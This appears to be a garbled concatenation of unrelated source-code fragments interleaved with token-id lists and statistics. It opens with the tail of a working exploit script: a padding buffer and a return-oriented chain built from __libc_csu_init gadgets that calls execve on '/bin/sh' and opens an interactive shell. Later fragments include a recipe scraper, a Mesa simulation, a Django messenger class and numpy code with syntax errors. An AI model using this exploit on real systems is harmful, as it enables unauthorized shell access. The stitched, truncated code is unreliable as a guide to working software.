\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x00\x00\x00\x00\x00\x00\x00\x00\x96\x08\x40\x00\x00\x00\x00\x00\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x48\x0e\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x60\x18\x60\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x80\x08\x40\x00\x00\x00\x00\x00\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xe0\x05\x40\x00\x00\x00\x00\x00\x68\x06\x40\x00\x00\x00\x00\x00\x60\x18\x60\x00\x00\x00\x00\x00\x4a\x07\x40\x00\x00\x00\x00\x00\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e'
proc.send(payload)
time.sleep(0.2)
proc.recvrepeat(0)
payload = p64(0x0)
payload += p64(target_base + __libc_csu_init_gadget1)
payload += p64(0x4141414141414141)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(target_base + __libc_csu_init_call_target)
payload += p64(0x0)
payload += p64(target_base + target.got['read'])
payload += p64(0x1)
payload += p64(target_base + __libc_csu_init_gadget2)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(target_base + target.sym['read'])
payload += p64(target_base + __libc_csu_init_gadget1)
payload += p64(0x4141414141414141)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(target_base + __libc_csu_init_call_target)
payload += p64(0x1)
payload += p64(0x0)
payload += p64(0x0)
payload += p64(target_base + __libc_csu_init_gadget2)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(target_base + target.sym['read'])
payload += p64(target_base + __libc_csu_init_gadget1)
payload += p64(0x4141414141414141)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(target_base + __libc_csu_init_call_target)
payload += p64(0x0)
payload += p64(target_base + target.bss())
payload += p64(0x3b)
payload += p64(target_base + __libc_csu_init_gadget2)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(target_base + target.sym['read'])
payload += p64(target_base + __libc_csu_init_gadget1)
payload += p64(0x4141414141414141)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(target_base + __libc_csu_init_call_target)
payload += p64(target_base + target.bss())
payload += p64(0x0)
payload += p64(0x0)
payload += p64(target_base + __libc_csu_init_gadget2)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(target_base + target.sym['read'])
proc.send(payload)
time.sleep(0.2)
payload = b'\x0e'
proc.send(payload)
time.sleep(0.2)
payload = b'\x2f\x62\x69\x6e\x2f\x73\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
proc.send(payload)
time.sleep(0.2)
proc.interactive()
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
6738,
279,
675,
1330,
1635,
198,
22866,
13,
19119,
7,
998,
796,
705,
28745,
2414,
3256,
28686,
796,
705,
23289,
3256,
2604,
62,
5715,
796,
705,
10951,
11537,
198,
198,
16793,
796,
... | 1.201777 | 10,690 |
import inspect
from bs4 import BeautifulSoup
from typing import Optional, Union
from ._settings import HEADERS
from ._schema import DefaultSchema
from ._utils import clean_vulgar_fraction, clean_unicode
class AllRecipes(DefaultSchema):
"""
"""
@classmethod
def __init__(self, url: str, headers: Optional[dict] = HEADERS):
"""
url : str
url
headers : dict, Optional
dict
"""
super().__init__(url)
self.soup = BeautifulSoup(self.page, "html.parser")
def title(self):
"""
"""
return self.soup.find("meta", {"property": "og:title"}).get("content")
def description(self):
"""
"""
return self.soup.find("meta", {"property": "og:description"}).get("content")
def instructions(self):
"""
"""
tags = self.soup.find("ul", {"class": "instructions-section"}).find_all("p")
return [tag.get_text() for tag in tags]
def author(self):
"""
"""
return self.soup.find("span", {"class": "author-name authorName"}).get_text()
def ratings(self):
"""
"""
return self.soup.find("meta", {"name": "og:rating"}).get("content")
def yields(self):
"""
"""
pass
def time(self) -> float:
"""
"""
pass
def category(self) -> list:
"""
"""
return [
self.soup.find("a", {"class": "breadcrumbs__link--last"})
.find("span")
.get_text()
]
def nutrition(self) -> dict:
"""
"""
nutrition = {}
text = (
self.soup.find("div", {"class": "recipe-nutrition-section"})
.find("div", {"class": "section-body"})
.get_text()
.strip()
)
if text.endswith("Full Nutrition"):
text = text.replace(". Full Nutrition", "")
text = text.split(";")
nutrition["Calories"] = float(text[0].split(" ")[0])
for t in text[1:]:
nutrient, amount = t.strip().split(" ")
nutrition[nutrient] = amount
return nutrition
def ingredients(self) -> list:
"""
"""
tags = self.soup.find_all("span", {"class": "ingredients-item-name"})
return [clean_unicode(tag.get_text()) for tag in tags]
| [
11748,
10104,
198,
6738,
275,
82,
19,
1330,
23762,
50,
10486,
198,
6738,
19720,
1330,
32233,
11,
4479,
198,
198,
6738,
47540,
33692,
1330,
39837,
4877,
198,
6738,
47540,
15952,
2611,
1330,
15161,
27054,
2611,
198,
6738,
47540,
26791,
1330... | 2.135472 | 1,122 |
import sys
import re
import doctest
import manuel.doctest
import manuel.codeblock
import manuel.testing
import unittest
if sys.version_info[0] < 3:
# Just don't do them under Python 3.
# Sigh.
if __name__ == '__main__':
unittest.TextTestRunner().run(additional_tests())
| [
11748,
25064,
198,
11748,
302,
198,
11748,
10412,
395,
198,
11748,
582,
2731,
13,
4598,
310,
395,
198,
11748,
582,
2731,
13,
8189,
9967,
198,
11748,
582,
2731,
13,
33407,
198,
11748,
555,
715,
395,
628,
198,
361,
25064,
13,
9641,
62,
... | 2.76699 | 103 |
import pandas as pd
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
import psycopg2
from sqlalchemy import create_engine
from config import db_password
#data from: https://www.kaggle.com/malapatiravi/graduate-school-admission-data/home
| [
11748,
19798,
292,
355,
279,
67,
198,
6738,
1341,
35720,
13,
29127,
62,
19849,
1330,
5972,
2569,
8081,
2234,
198,
6738,
1341,
35720,
13,
19849,
62,
49283,
1330,
4512,
62,
9288,
62,
35312,
198,
6738,
1341,
35720,
13,
3866,
36948,
1330,
... | 3.365385 | 104 |
from mesa.visualization.ModularVisualization import ModularServer
from mesa.visualization.modules import CanvasGrid
from mesa.visualization.UserParam import UserSettableParameter
from mesa.visualization.modules import ChartModule
from .model import CivilViolenceModel
from .agent import Citizen, Cop
COP_COLOR = "Black"
AGENT_QUIET_COLOR = "Blue"
AGENT_REBEL_COLOR = "Red"
JAIL_COLOR = "Grey"
height=70
width=70
model_params = {
'height':height,
'width':width,
# 'height': UserSettableParameter('slider', 'Height', 40, 10, 100, 1,
# description='Citizen Density'),
# 'width': UserSettableParameter('slider', 'Width', 40, 10, 100, 1,
# description='Citizen Density'),
'citizen_density': UserSettableParameter('slider', 'Citizen Density', 0.7, 0.0, 1, 0.01,
description='Citizen Density'),
'cop_density': UserSettableParameter('slider', 'Cop Density', 0.1, 0.0, 1, 0.01,
description='Cop Density'),
'citizen_vision': UserSettableParameter('slider', 'Citizen Vision', 7, 0, 20, 1,
description='Citizen vision'),
'cop_vision': UserSettableParameter('slider', 'Cop Vision', 7, 0, 20, 1,
description='Cop Vision'),
'legitimacy': UserSettableParameter('slider', 'Legitimacy', 0.8, 0.0, 1.0, 0.01,
description='Legitimacy'),
'max_jail_term': UserSettableParameter('slider', 'Max Jail Term', 1000, 0, 10000, 1,
description='Max Jail Term')
}
chart = ChartModule([{"Label": "Active",
"Color": "Red"}],
data_collector_name='datacollector')
canvas_element = CanvasGrid(citizen_cop_portrayal, model_params['height'], model_params['height'], 700, 700)
server = ModularServer(CivilViolenceModel, [canvas_element, chart],
"Epstein Civil Violence", model_params)
| [
6738,
18842,
64,
13,
41464,
1634,
13,
5841,
934,
36259,
1634,
1330,
3401,
934,
10697,
198,
6738,
18842,
64,
13,
41464,
1634,
13,
18170,
1330,
1680,
11017,
41339,
198,
6738,
18842,
64,
13,
41464,
1634,
13,
12982,
22973,
1330,
11787,
50,
... | 2.090909 | 1,023 |
import json
from elasticsearch import Elasticsearch
from tube.etl.outputs.es.timestamp import (
putting_timestamp,
get_latest_utc_transaction_time,
)
from tube.etl.outputs.es.versioning import Versioning
from tube.etl.plugins import post_process_plugins, add_auth_resource_path_mapping
from tube.etl.spark_base import SparkBase
from tube.utils.general import get_node_id_name
| [
11748,
33918,
198,
198,
6738,
27468,
12947,
1330,
48567,
12947,
198,
198,
6738,
12403,
13,
316,
75,
13,
22915,
82,
13,
274,
13,
16514,
27823,
1330,
357,
198,
220,
220,
220,
5137,
62,
16514,
27823,
11,
198,
220,
220,
220,
651,
62,
42... | 3.055118 | 127 |
import math
from classes.dataframes import *
import numpy as np
# class Utility:
#
# def __init__(self):
# self.Data = Dataframes()
# self.df_orders = self.Data.get_df_orders()
# self.grid_rows = self.Data.grid_row
# self.grid_cols = self.Data.grid_col
# self.df_wrhs = self.Data.get_df_wareouses()
# def calc_distance(self, xa, ya, xb, yb):
# return math.sqrt((abs(xa - xb)) ** 2 + (abs(ya - yb)) ** 2)
| [
11748,
10688,
198,
6738,
6097,
13,
7890,
37805,
1330,
1635,
198,
11748,
299,
32152,
355,
45941,
628,
198,
2,
1398,
34030,
25,
198,
2,
198,
2,
220,
220,
220,
220,
825,
11593,
15003,
834,
7,
944,
2599,
198,
2,
220,
220,
220,
220,
22... | 2.171429 | 210 |
from typing import Dict, List, Union
from sqlalchemy.dialects.postgresql import ENUM
from db import db
from models.model_mixin import ModelMixin
ActorJSON = Dict[str, Union[int, str, List[str]]]
gender_enum = ENUM("Male", "Female", name="gender")
class ActorModel(db.Model, ModelMixin):
"""SQLAlchemy model for actors"""
__tablename__ = "actors"
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(50), nullable=False)
date_of_birth = db.Column(db.Date, nullable=False)
gender = db.Column(gender_enum)
@classmethod
@classmethod
@classmethod
| [
6738,
19720,
1330,
360,
713,
11,
7343,
11,
4479,
201,
198,
6738,
44161,
282,
26599,
13,
38969,
478,
82,
13,
7353,
34239,
13976,
1330,
12964,
5883,
201,
198,
6738,
20613,
1330,
20613,
201,
198,
6738,
4981,
13,
19849,
62,
19816,
259,
13... | 2.503968 | 252 |
#!/usr/bin/env spcli
# this command runs hierarchical FST comparison
from seqpy import cout, cerr
from seqpy.cmds import arg_parser
from seqpy.core.bioio import tabparser
import itertools
import allel
| [
2,
48443,
14629,
14,
8800,
14,
24330,
599,
44506,
198,
198,
2,
428,
3141,
4539,
38958,
376,
2257,
7208,
198,
198,
6738,
33756,
9078,
1330,
42304,
11,
269,
8056,
198,
6738,
33756,
9078,
13,
28758,
82,
1330,
1822,
62,
48610,
198,
6738,
... | 3.166667 | 66 |
import argparse
import csv
import logging
import random
import numpy as np
import nibabel as nib
from pathlib import Path
if __name__ == "__main__":
logging.basicConfig(format='%(asctime)s | %(name)-4s | %(levelname)-4s | %(message)s',
level=logging.INFO, datefmt='%Y-%m-%d %H:%M:%S')
args = _parse_args()
main(args)
| [
11748,
1822,
29572,
198,
11748,
269,
21370,
198,
11748,
18931,
198,
11748,
4738,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
33272,
9608,
355,
33272,
198,
6738,
3108,
8019,
1330,
10644,
628,
628,
198,
361,
11593,
3672,
834,
6624,
366,... | 2.288462 | 156 |
from base import LeetCodeProblem
class Problem(LeetCodeProblem):
# for behaviours other than exact match between solution output and expected output
# see # Testers in README.md
"""
https://leetcode.com/problems/super-ugly-number/
# first attempt:
## invariant
since all prime factor of SUNum are in primes,
it means SUNums can be obtained by multiplying primes
## approach:
generate SUNum by multiplying members of primes and push onto a max heap
when max heap reaches n size, get max
"""
# instanciate your Problem class and run
prob = Problem()
prob.run()
| [
6738,
2779,
1330,
1004,
316,
10669,
40781,
628,
198,
4871,
20647,
7,
3123,
316,
10669,
40781,
2599,
198,
220,
220,
220,
1303,
329,
38975,
584,
621,
2748,
2872,
1022,
4610,
5072,
290,
2938,
5072,
198,
220,
220,
220,
1303,
766,
1303,
30... | 3.226316 | 190 |
import networkx.algorithms.operators.tests.test_all
import pytest
from graphscope.nx.utils.compat import import_as_graphscope_nx
import_as_graphscope_nx(networkx.algorithms.operators.tests.test_all,
decorators=pytest.mark.usefixtures("graphscope_session"))
@pytest.mark.skip(reason="not support multigraph")
@pytest.mark.skip(reason="not support multigraph")
@pytest.mark.skip(reason="not support multigraph")
@pytest.mark.skip(reason="not support multigraph")
@pytest.mark.skip(reason="not support multigraph")
@pytest.mark.skip(reason="not support multigraph")
| [
11748,
3127,
87,
13,
282,
7727,
907,
13,
3575,
2024,
13,
41989,
13,
9288,
62,
439,
198,
11748,
12972,
9288,
198,
198,
6738,
4823,
29982,
13,
77,
87,
13,
26791,
13,
5589,
265,
1330,
1330,
62,
292,
62,
34960,
29982,
62,
77,
87,
198,... | 2.795349 | 215 |
import os
| [
198,
11748,
28686,
198
] | 2.75 | 4 |
import numpy as np
import pandas as pd
import gzip
import sys
from collections import Counter
import os
DATA_DIR = "../data/"
if not os.path.exists(DATA_DIR):
os.makedirs(DATA_DIR)
| [
11748,
299,
32152,
355,
45941,
198,
11748,
19798,
292,
355,
279,
67,
198,
11748,
308,
13344,
198,
11748,
25064,
198,
6738,
17268,
1330,
15034,
198,
11748,
28686,
198,
198,
26947,
62,
34720,
796,
366,
40720,
7890,
30487,
198,
198,
361,
4... | 2.690141 | 71 |
#!/usr/bin/env python
# coding: utf-8
# In[17]:
import numpy as np
from numpy import linalg as LA
dimension=2 #次元を指定する
v=randomnumber(dimension)
e=np.zeros((dimension,dimension),dtype='float64')#エルミット演算子を生成する単位ベクトル
u=getu(dimension)
print(u)
for c in range(0,dimension):
e[c]=u[c]/LA.norm(u[c],2)#·ord=2
print(e)
# In[18]:
#psi=np.random.random((dimension))
#psi=e[0]
psi=np.array([e[0]])
print(psi)
print(LA.norm(psi,2)) #ノルム確認
# In[19]:
np.dot(np.dot(psi,e),psi.T)
# In[27]:
f=0
for a in range(0,10000):
u=getu(dimension)
for c in range(0,dimension):
e[c]=u[c]/LA.norm(u[c],2)#·ord=2
psi=psi=np.array([e[0]])
d=np.dot(np.dot(psi,e),psi.T)
if(d>=0):
f=f+1
print(f)
# # 多量子ビット系
# In[28]:
for a in range(0,2):
# In[ ]:
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
19617,
25,
3384,
69,
12,
23,
198,
198,
2,
554,
58,
1558,
5974,
628,
198,
11748,
299,
32152,
355,
45941,
198,
6738,
299,
32152,
1330,
300,
1292,
70,
355,
9131,
628,
198,
46156,
2... | 1.694387 | 481 |
import json
import io
| [
11748,
33918,
198,
11748,
33245,
628
] | 3.833333 | 6 |
import json
import os
import random
import requests
from django_project import settings
from django.http import HttpResponse, JsonResponse
from messenger.utils.response.ResponseTypes.QuickReplyResponse import QuickReplyResponse
from messenger.utils.response.ResponseTypes.TextResponse import TextResponse
from django.conf import settings
def value_validator(variables, values):
"""
1. Checks if "values" is of type <dict>
2. Checks if all variables are present in the values <dict>
:param variables: <list>
:param values: <dict>
:raise: InvalidTemplateValues, IncompleteTemplateValues
:return None
"""
return None
# if type(values) is not dict:
# raise InvalidTemplateValues(values)
# elif set(variables) != set(dict.keys(values)):
# raise IncompleteTemplateValues([v for v in variables if v not in values])
class Response(object):
"""
Response class for chat data and text templating.
"""
def __init__(self, data, page_access_token=None):
"""
:param data: message data
"""
self.params = {"access_token": page_access_token}
self.headers = {"Content-Type": "application/json"}
self.data = {"recipient": {"id": None}, "message": {}}
self.text = TextResponse(data["text"]) \
if "text" in data else None
self.quick_replies = QuickReplyResponse(data["quick_replies"]) \
if "quick_replies" in data else None
self.attachments = data.get("attachments", {})
def add_recipient_id(self, recipient_id):
"""
Adds the chat receivers id to instance
:param recipient_id: facebook_id of a chat participant
"""
self.data["recipient"]["id"] = recipient_id
def send_to(self, recipient_id, page_access_token, node_name):
"""
Orders messages before sending
:param recipient_id: facebook_id of a chat participant
"""
self.params = {"access_token": page_access_token}
self.add_recipient_id(recipient_id)
r = None
if self.quick_replies and self.text: # If quick_replies and text
r = self.send(self.data["message"], ["quick_replies", "text"], recipient_id) # are both present send both
elif self.text:
# send text if quick_replies
r = self.send(self.data["message"], ["text"], recipient_id) # are not present
if self.attachments: # Send attachments alone
r = self.send(self.data["message"], ["attachment"], recipient_id)
# always, in compatible with
# text and quick_replies
self.data['intent'] = node_name
return JsonResponse(self.data)
def extract_message(self, text_response_data=None, quick_reply_response_data=None, attachment_response_data=None):
"""
Evaluate template strings in text/quick_replies/attachments and convert them to a value.
:param text_response_data:
